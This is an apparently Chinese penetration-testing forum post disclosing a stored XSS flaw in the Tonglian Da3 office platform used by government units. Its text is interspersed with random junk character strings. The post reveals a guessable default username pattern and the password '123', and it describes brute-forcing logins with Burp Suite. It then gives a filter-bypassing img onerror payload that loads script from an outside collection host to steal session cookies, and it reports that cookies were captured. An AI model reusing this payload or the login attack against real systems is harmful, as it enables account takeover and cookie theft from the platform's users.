同联Da3协同办公平台后台通用储存型xss漏洞
0 g& T* E+ d9 E6 G9 I' b$ n# n+ z 平台简介:1 N* m! ?& ]( ` v
8 Y0 F2 m* j/ P v' z1 X+ i" p$ ]& u, E
. Z# b( y& n2 B5 P- H$ H! A6 i( P
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
0 O/ K5 e: X7 _, p! X
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
/ {! T4 Y* y) D+ G0 [- U+ q
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
8 {! H7 w, N* D: V( r, Q- S2 Q. @ 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:" F7 g+ I2 W* r2 x
- q! x( W* B- D
http://1.1.1.1:7197/cap-aco/#(案例2-)
+ @# j8 I9 D! e8 Q4 p6 `+ @$ j3 C4 p$ @: y% N7 Y0 {/ \* g http://www.XXOO.com (案例1-官网网站)8 o5 G% b- d$ r9 p6 d; ^ z
# |& U2 X }8 Z' q- K0 Z9 q 漏洞详情:( a1 ~; N( W! ~8 d7 ^4 S, r
9 h. Q& V* ^, a } J5 t" f8 T) M- D6 L, a1 f& F 案例一、7 O( R; T5 }$ m7 D
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
; Y R4 ~+ [9 o% f; p+ p0 { 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
+ [4 C$ ?5 ^$ O% ~4 U' N1 O( v# L1 v( \1 Z
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ; [, C7 }5 B! g$ q; J9 U3 C/ d
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 7 W: @ s' D/ f! L' w
* K+ L3 K% k5 C2 H# g$ F0 f
<img src=x& I, z3 B* z# \1 J onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: : x: Q( ], a( a5 z
8 Z2 t; _$ X3 l+ a" |# a' i$ b. I: _9 U4 i. U
' Y1 t) s2 J; C. e) ^; p
% Y. e1 i: d* R* [/ t% f. N& L1 g 然后发送,接收cookie如图: 0 j ?/ ]. Z+ ^' O$ r3 w: P
$ c7 Q3 D+ u3 K d3 T8 ^) o; w0 }: {. ?
! j& z! Z" Z' {; A# j+ U1 U5 f5 f6 I
$ G- y. R% N' b, h
& ]/ `- H& K" o! U$ X9 M! @
, k% k- G- x. N, L" t! F
2 f, @, d8 M4 r7 z* B
: R5 |: X2 {1 r2 P1 I 前面步骤都一样,下面看效果图:
2 a4 ~0 P4 h% b/ W& @. E* M. J , k: U. h! f$ {6 x$ P$ J4 a0 g" K9 F0 F0 `) Y# D
) S$ W: t5 Z9 b `; v# m+ I& E' D0 p0 `
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |